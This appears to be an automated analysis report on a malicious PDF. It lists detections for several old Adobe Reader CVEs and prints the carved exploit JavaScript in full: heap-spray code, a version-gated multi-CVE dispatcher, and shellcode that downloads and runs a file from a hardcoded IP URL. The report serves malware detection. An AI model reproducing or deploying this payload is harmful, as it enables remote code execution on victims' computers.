MALICIOUS
Risk Score: 570
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (12)
- media.newPlayer — CVE-2009-4324 (critical, CVE exact, CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical, CVE exact, CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 (critical, CVE exact, CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical, CVE likely, PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- ClamAV: Js.Exploit.HTML-28 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Js.Exploit.HTML-28
- Multi-CVE Adobe Reader JavaScript exploit kit (critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low, 2 related findings, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF exploit shellcode contains an embedded download URL (high, PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://91.205.74.23/w.php?f=233&e=3 (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0076_000.js | pdf-javascript-stream | PDF /JS object 76 at offset 0x2C2 | 11553 bytes |

SHA-256: f4920b8eb53dcd8a14566061b6e8c1a206369544f485e086eaeec32cc4be2c9d
Detection (ClamAV): Js.Exploit.HTML-28
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
x='e';
arr='[@-separated character-table indices, removed]';
cc={q:'h5A{NUVsc"-o4>9Mv(;8kw3a017t&Ixq)%].bfD_pG/mEn[PQC"izd2We:g@Sy*6=<+uKr ,l|j}'}.q;
q=x+'v'+'al';
a=(Date+String).substr(2,3);
aa=([].unshift+[].reverse).substr(2,3);
if (aa==a){
t='3vtwe';
e=t['substr'];
w=e(12)[q];
s=[];
ar=arr.split('@');
n=cc;
for(i=0;i<ar.length;i++){
s[i]=n[ar[i]];
}
if(a===aa)w(s.join(''));
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| split_char_table_stage_000.js | deobfuscated-js | split character-table join decoded JavaScript at offset 0x2D1 | 3858 bytes |

SHA-256: ec46f900ec5f26b754bab78eb2cd25ae94c0f2e129f25cfbd7fb8154fd930985
Detection (ClamAV): No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
if(e("1"))bjsg="%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3332%u2633%u3d65%u0033%u0000";function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var 
payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd("p@111111111111111111111111 : yyyy111",new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=="EScript"){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape("%u9090%u9090");var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}